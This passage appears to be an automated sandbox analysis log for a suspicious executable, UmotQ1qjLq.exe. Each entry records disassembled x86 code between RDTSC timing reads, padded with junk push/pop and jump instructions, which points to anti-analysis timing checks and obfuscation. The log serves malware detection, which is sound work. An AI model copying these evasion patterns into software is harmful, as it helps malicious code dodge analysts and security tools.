Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0E376 second address: D0E38F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4760DF153Eh 0x00000008 jbe 00007F4760DF1536h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CD371F second address: CD3723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CD3723 second address: CD3739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4760DF153Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CD3739 second address: CD373F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0C489 second address: D0C49F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1540h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0C49F second address: D0C4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0C626 second address: D0C62A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0C62A second address: D0C634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0C634 second address: D0C667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1549h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4760DF1543h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0C7C5 second address: D0C7CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0C93F second address: D0C965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 je 00007F4760DF1553h 0x0000000d jmp 00007F4760DF1547h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0D2DF second address: D0D2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007F4760DF9846h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D003B3 second address: D003C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F4760DF1536h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D003C0 second address: D003C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D003C6 second address: D003D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F4760DF1538h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0D44C second address: D0D451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0DB7C second address: D0DB9E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4760DF1546h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D126B8 second address: D126BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D127FF second address: D12815 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4760DF1536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F4760DF153Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D12815 second address: D12819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D12819 second address: D12834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D12834 second address: D12839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D12839 second address: D12843 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4760DF153Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D12843 second address: D12872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 push edi 0x0000000a jo 00007F4760DF9846h 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4760DF9857h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D12872 second address: D12878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D12960 second address: D12966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D142E4 second address: D1430A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F4760DF1548h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE43FD second address: CE4403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE4403 second address: CE440B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE440B second address: CE4451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9856h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4760DF9850h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F4760DF9858h 0x00000018 jmp 00007F4760DF9852h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CCB0BE second address: CCB0FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4760DF1536h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F4760DF1546h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4760DF1544h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D187FA second address: D1882E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F4760DF9846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 jmp 00007F4760DF984Ah 0x00000015 popad 0x00000016 push ebx 0x00000017 jmp 00007F4760DF9855h 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D18ABD second address: D18AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D18AC3 second address: D18AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D190CB second address: D190D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D190D9 second address: D190DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D190DD second address: D190E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1BAE3 second address: D1BAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1BAE7 second address: D1BAF1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4760DF1536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1BAF1 second address: D1BB48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4760DF984Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f jnp 00007F4760DF9857h 0x00000015 jmp 00007F4760DF9851h 0x0000001a pop edi 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push edx 0x00000020 jmp 00007F4760DF9859h 0x00000025 pop edx 0x00000026 mov eax, dword ptr [eax] 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1BB48 second address: D1BB71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007F4760DF1549h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1BB71 second address: D1BB75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1BFD3 second address: D1BFD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1C202 second address: D1C20F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1C20F second address: D1C213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1C7B6 second address: D1C7BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1C7BC second address: D1C7E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b sbb di, 2651h 0x00000010 nop 0x00000011 push edx 0x00000012 jmp 00007F4760DF1542h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push esi 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1C870 second address: D1C891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4760DF9859h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1C891 second address: D1C8B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4760DF1544h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1C8B1 second address: D1C8B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1C8B5 second address: D1C8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1CDAD second address: D1CDB7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4760DF9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1ED6C second address: D1ED8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007F4760DF1536h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1E435 second address: D1E43C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1F737 second address: D1F794 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4760DF1547h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F4760DF1538h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D1C98h], edi 0x00000030 mov di, 7931h 0x00000034 push 00000000h 0x00000036 stc 0x00000037 adc si, E112h 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007F4760DF1538h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D20242 second address: D20248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D20248 second address: D2024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D20C84 second address: D20C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D20C88 second address: D20CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F4760DF153Ch 0x0000000f pushad 0x00000010 or dword ptr [ebp+122D1C98h], edi 0x00000016 mov ah, ch 0x00000018 popad 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c jmp 00007F4760DF1548h 0x00000021 push 00000000h 0x00000023 sub dword ptr [ebp+122D2E30h], edx 0x00000029 xchg eax, ebx 0x0000002a jnp 00007F4760DF154Bh 0x00000030 jmp 00007F4760DF1545h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jnp 00007F4760DF1536h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D20CF2 second address: D20CFC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4760DF9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D20CFC second address: D20D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2159B second address: D215A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D221DD second address: D221E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D221E1 second address: D22237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F4760DF9855h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F4760DF9848h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov esi, 1B4E5484h 0x0000002e push 00000000h 0x00000030 movsx edi, bx 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jnc 00007F4760DF984Ch 0x0000003c rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D24BC1 second address: D24BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D24BC5 second address: D24BCF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D24BCF second address: D24C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F4760DF1541h 0x0000000d nop 0x0000000e mov di, ABA6h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F4760DF1538h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov ebx, 63B03567h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F4760DF1538h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f movsx edi, di 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F4760DF153Eh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D25BA7 second address: D25BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D27BBD second address: D27BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D26E38 second address: D26E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D26E3E second address: D26E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D26E42 second address: D26E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D28BC2 second address: D28BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D28BC6 second address: D28C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jnp 00007F4760DF984Ch 0x00000011 sub dword ptr [ebp+122D3106h], esi 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D2EAEh], ebx 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F4760DF9848h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000015h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b mov ebx, eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D29B71 second address: D29B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2AB21 second address: D2ABC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF984Ch 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2C08h], esi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F4760DF9848h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 adc ebx, 20ECF437h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 je 00007F4760DF984Ch 0x00000047 mov ebx, dword ptr [ebp+12456A30h] 0x0000004d mov eax, dword ptr [ebp+122D0011h] 0x00000053 mov ebx, dword ptr [ebp+122D2E00h] 0x00000059 push FFFFFFFFh 0x0000005b mov edi, dword ptr [ebp+122D30B9h] 0x00000061 mov ebx, dword ptr [ebp+122D1D9Ch] 0x00000067 nop 0x00000068 pushad 0x00000069 jmp 00007F4760DF984Ch 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F4760DF9857h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2BC3B second address: D2BC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2ABC0 second address: D2ABED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F4760DF984Ch 0x00000013 jns 00007F4760DF9846h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2BC3F second address: D2BC43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
